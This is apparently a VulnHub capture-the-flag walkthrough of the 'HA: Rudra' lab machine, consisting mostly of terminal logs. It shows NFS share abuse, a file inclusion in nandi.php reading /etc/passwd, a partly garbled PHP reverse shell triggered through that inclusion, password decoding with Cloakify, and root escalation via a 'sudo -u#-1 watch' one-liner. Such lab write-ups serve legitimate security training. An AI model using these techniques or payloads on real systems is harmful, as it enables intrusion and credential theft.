HA RUDRA (VULNHUB)

root@kali:~# nmap -A 192.168.48.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 17:48 GMT
Nmap scan report for 192.168.48.132
Host is up (0.00038s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA)
| 256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA)
|_ 256 30:da:01:de:ab:d8:19:1e:fc:58:44:22:3b:29:33:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Rudra
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35880/udp6 mountd
| 100005 1,2,3 44666/udp mountd
| 100005 1,2,3 48755/tcp6 mountd
| 100005 1,2,3 58197/tcp mountd
| 100021 1,3,4 38053/tcp6 nlockmgr
| 100021 1,3,4 41059/tcp nlockmgr
| 100021 1,3,4 45041/udp6 nlockmgr
| 100021 1,3,4 51030/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 00:0C:29:78:5A:A2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.48.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

on browser

http://192.168.48.132/

root@kali:~/Downloads# showmount -e 192.168.48.132
Export list for 192.168.48.132:
/home/shivay *
root@kali:~/Downloads# cd /tmp
root@kali:/tmp# mkdir ignite
root@kali:/tmp# mount -t nfs 192.168.48.132:/home/shivay /tmp/ignite
root@kali:/tmp# cd ignite
root@kali:/tmp/ignite# ls
mahadev.txt
root@kali:/tmp/ignite# cat mahadev.txt
Rudra is another name of Lord Shiva. As per the vedic scriptures there are total 11 rudras. Of them, prominent one is Shiva. The other 10 rudras are considered as his expansions. As per Mahabharata, Srimad Bhagavatam and other vedic texts Lord Shiva appeared from Lord Brahma’s eyebrows. Srimad Bhagvatam tells us why Lord Shiva is known as β€œRudra”:

root@kali:/tmp/ignite# dirb http://192.168.48.132/

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Fri Nov 15 17:55:15 2019
URL_BASE: http://192.168.48.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.48.132/ —-
==> DIRECTORY: http://192.168.48.132/assets/
==> DIRECTORY: http://192.168.48.132/img/
+ http://192.168.48.132/index.html (CODE:200|SIZE:4639)
+ http://192.168.48.132/robots.txt (CODE:200|SIZE:10)
+ http://192.168.48.132/server-status (CODE:403|SIZE:279)

—- Entering directory: http://192.168.48.132/assets/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.48.132/img/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—————–
END_TIME: Fri Nov 15 17:55:20 2019
DOWNLOADED: 4612 – FOUND: 3

now on browser

http://192.168.48.132/robots.txt

output: nandi.php

http://192.168.48.132/nandi.php?file=/etc/passwd

output :

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin rudra:x:1000:1000:rudra,,,:/home/rudra:/bin/bash sshd:x:106:65534::/run/sshd:/usr/sbin/nologin mahakaal:x:1001:1001:,,,:/home/mahakaal:/bin/bash statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin shivay:x:1002:1002:,,,:/home/shivay:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

root@kali:/tmp/ignite# gedit shell.php

array(“pipe”, “r”), // stdin is a pipe that the child will read from
1 => array(“pipe”, “w”), // stdout is a pipe that the child will write to
2 => array(“pipe”, “w”) // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit(“ERROR: Can’t spawn shell”);
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won’t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit(“Successfully opened reverse shell to $ip:$port”);

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit(“ERROR: Shell connection terminated”);
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit(“ERROR: Shell process terminated”);
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process’s STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit(“SOCK READ”);
$input = fread($sock, $chunk_size);
if ($debug) printit(“SOCK: $input”);
fwrite($pipes[0], $input);
}

// If we can read from the process’s STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit(“STDOUT READ”);
$input = fread($pipes[1], $chunk_size);
if ($debug) printit(“STDOUT: $input”);
fwrite($sock, $input);
}

// If we can read from the process’s STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit(“STDERR READ”);
$input = fread($pipes[2], $chunk_size);
if ($debug) printit(“STDERR: $input”);
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we’ve daemonised ourself
// (I can’t figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print “$string\n”;
}
}

?>

save it

root@kali:/tmp/ignite# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

http://192.168.48.132/nandi.php?file=/home/shivay/shell.php

and we get the shell

root@kali:/tmp/ignite# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.48.132.
Ncat: Connection from 192.168.48.132:52344.
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:10:08 up 21 min, 0 users, load average: 0.01, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@ubuntu:/$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:41059 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:60561 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:58197 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:44447 0.0.0.0:* LISTEN –
tcp 0 104 192.168.48.132:52344 192.168.48.131:1234 ESTABLISHED 904/sh
tcp 0 0 192.168.48.132:2049 192.168.48.131:851 ESTABLISHED –
tcp6 0 0 :::2049 :::* LISTEN –
tcp6 0 0 :::38053 :::* LISTEN –
tcp6 0 0 :::111 :::* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::48755 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
tcp6 0 0 :::59927 :::* LISTEN –
tcp6 0 0 :::47067 :::* LISTEN –
tcp6 0 0 192.168.48.132:80 192.168.48.131:51902 ESTABLISHED –

www-data@ubuntu:/$ mysql -u root
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> show databases;
show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| mahadev |
| mysql |
| performance_schema |
| sys |
+——————–+
5 rows in set (0.01 sec)

mysql> use mahadev;
use mahadev;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+——————-+
| Tables_in_mahadev |
+——————-+
| hint |
+——————-+
1 row in set (0.00 sec)

mysql> select * from hint;
select * from hint;
+—————————+
| hint |
+—————————+
| check on media filesystem |
+—————————+
1 row in set (0.00 sec)

mysql> exit
exit
Bye
www-data@ubuntu:/$ cd /media
cd /media
www-data@ubuntu:/media$ ls -la
ls -la
total 24
drwxr-xr-x 4 root root 4096 Oct 21 09:08 .
drwxr-xr-x 22 root root 4096 Oct 21 07:43 ..
drwxr-xr-x 2 root root 4096 Oct 21 07:42 cdrom
-rw-r–r– 1 root root 140 Oct 21 08:50 creds
lrwxrwxrwx 1 root root 7 Oct 21 07:42 floppy -> floppy0
drwxr-xr-x 2 root root 4096 Oct 21 07:42 floppy0
-rw-r–r– 1 root root 122 Oct 21 09:08 hints
www-data@ubuntu:/media$ cat hints
cat hints
https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/

without noise
www-data@ubuntu:/media$ cat creds
cat creds
😴
😬
πŸ˜₯
😭
🐼
😬
πŸ™ˆ
πŸ˜•
🐼
😬
🐡
😊
πŸ˜€
😻
πŸ˜₯
πŸ˜“
🐼
πŸ˜…
πŸ˜•
πŸ˜•
πŸ˜€
πŸ™Š
😾
πŸ˜•
😝
πŸ˜›
πŸ™Ž
πŸ™Ž

https://github.com/TryCatchHCF/Cloakify

root@kali:/tmp/ignite/Cloakify# python cloakifyFactory.py
____ _ _ _ __ ______ _
/ __ \ | | | |_|/ _| | ___| | |
| / \/ | ___ __ _| | ___| |_ _ _ | |_ __ _ ___| |_ ___ _ __ _ _
| | | |/ _ \ / _` | |/ / | _| | | | | _/ _` |/ __| __/ _ \| ‘__| | | |
| \__/\ | |_| | |_| | <| | | | |_| | | || |_| | |__| || |_| | | | |_| | \____/_|\___/ \__,_|_|\_\_|_| \__, | \_| \__,_|\___|\__\___/|_| \__, | __/ | __/ | |___/ |___/ “Hide & Exfiltrate Any Filetype in Plain Sight” Written by TryCatchHCF https://github.com/TryCatchHCF (\~—. / (\-`-/) ( ‘ ‘ ) data.xls image.jpg \ List of emoji, IP addresses, \ ( \_Y_/\ ImADolphin.exe backup.zip –> sports teams, desserts,
“”\ \___// LoadMe.war file.doc / beers, anything you imagine
`w “

==== Cloakify Factory Main Menu ====

1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit

Selection: 2

==== Decloakify a Cloaked File ====

Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/pwd

Save decloaked data to filename (default: ‘decloaked.file’): /root/decodedpwd

Preview cloaked file? (y/n default=n): n
Was noise added to the cloaked file? (y/n default=n): n

Ciphers:

1 – belgianBeers
2 – rickrollYoutube
3 – dessertsSwedishChef
4 – ipAddressesTop100
5 – worldFootballTeams
6 – dessertsThai
7 – evadeAV
8 – starTrek
9 – dessertsArabic
10 – skiResorts
11 – hashesMD5
12 – pokemonGo
13 – topWebsites
14 – worldBeaches
15 – desserts
16 – geocache
17 – statusCodes
18 – amphibians
19 – geoCoordsWorldCapitals
20 – emoji
21 – dessertsChinese
22 – dessertsRussian
23 – dessertsHindi
24 – dessertsPersian

Enter cipher #: 20

Decloaking file using cipher: emoji

!!! Decloaked file /root/pwd., save to /root/decodedpwd

root@kali:/tmp/ignite/Cloakify# cat decodedpwd

mahakaal:kalbhairav

oot@kali:/tmp/ignite/Cloakify# ssh mahakaal@192.168.48.132
The authenticity of host ‘192.168.48.132 (192.168.48.132)’ can’t be established.
ECDSA key fingerprint is SHA256:uJVa69XQYauqQVQn0+cN2ja+kVf0BhhWII8EIREHGT4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘192.168.48.132’ (ECDSA) to the list of known hosts.
mahakaal@192.168.48.132’s password: kalbhairav
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Mon Oct 21 09:59:11 2019 from 192.168.1.107
mahakaal@ubuntu:~$ sudo -l
[sudo] password for mahakaal: kalbhairav
Matching Defaults entries for mahakaal on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakaal may run the following commands on ubuntu:
(ALL, !root) /usr/bin/watch
mahakaal@ubuntu:~$ sudo -u#-1 watch -x sh -c ‘reset; exec sh 1>&0 2>&0’ -u
#
# cd /root
# cat final.txt

. ]@&L .
Jw #@&& zM
‘|$w ,]@&$L ,$\r
k|$L ]]@$$$ ,@|j
]@!$ j]@&$$W $|p[
@@j$ ]j]N&$$@ $@@@
$&@B~ jj]B&$$@ @@$@
#R&&[ `]]@&$$* ]$$@N
j%%@$ “@&M ]RN%k
|” 7$ $& ]F%”|
(%'”$ $ $@%”)
\%%$ *g@* $%”/
”*]%r&& %h*”’
‘L@&=r
‘@&U
j@&L
]@&[
$@&K
$@&@
$$$@
j@Hw. -&&&&L ,=m$~
j@%%kkHr. <[kkj]%r j@@gjjji||!;;!||jjjj%]%r j@Hkkj|||!=||~!l|jjjk%%r j@%%kisj|;!!*!;|!{{jj]%r j@@pkjb*` !#$#! `*jjkk]%r j[M”` ‘&7!’ `*%$r !%%!; ;||!; ;||!: !! Congrats you have finished this task !! Contact us here: Hacking Articles : https://twitter.com/rajchandel/ Aarti Singh: https://www.linkedin.com/in/aarti-singh-353698114/ +-+-+-+-+-+ +-+-+-+-+-+-+-+ |E|n|j|o|y| |H|A|C|K|I|N|G| +-+-+-+-+-+ +-+-+-+-+-+-+-+ ____________________________________

@SAKSHAM DIXIT